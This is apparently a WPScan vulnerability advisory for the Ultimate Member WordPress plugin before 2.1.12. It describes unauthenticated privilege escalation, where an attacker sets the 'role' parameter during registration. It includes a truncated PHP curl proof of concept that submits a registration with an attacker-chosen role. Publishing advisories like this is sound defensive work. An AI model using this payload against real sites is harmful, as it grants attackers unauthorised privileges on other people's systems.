Lucene search

K
wpvulndbChloe ChamberlandWPVDB-ID:33F059C5-58E5-44B9-BB27-793C3CEDEF3B
HistoryNov 09, 2020 - 12:00 a.m.

Ultimate Member < 2.1.12 - Unauthenticated Privilege Escalation via User Roles

2020-11-0900:00:00
Chloe Chamberland
wpscan.com
15

0.005 Low

EPSS

Percentile

75.4%

Due to the lack of filtering on the role parameter that could be supplied during the registration process, an attacker could supply the role parameter with a WordPress capability or any custom Ultimate Member role and effectively be granted those privileges.

PoC

$username, ‘first_name-’. $form_id => $name, ‘last_name-’ . $form_id => $lastname, ‘user_email-’ . $form_id => $email, ‘user_password-’ . $form_id => ‘StrongPassword123!’, ‘confirm_user_password-’ . $form_id => ‘StrongPassword123!’, ‘role’ => $um_role, ‘form_id’ => $form_id, ‘timestamp’ => ‘1603399250’, ‘um_request’ => ‘’, ‘_wpnonce’ => $nonce, ‘_wp_http_referer’ => ‘register’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>

CPENameOperatorVersion
ultimate-memberlt2.1.12

0.005 Low

EPSS

Percentile

75.4%

Related for WPVDB-ID:33F059C5-58E5-44B9-BB27-793C3CEDEF3B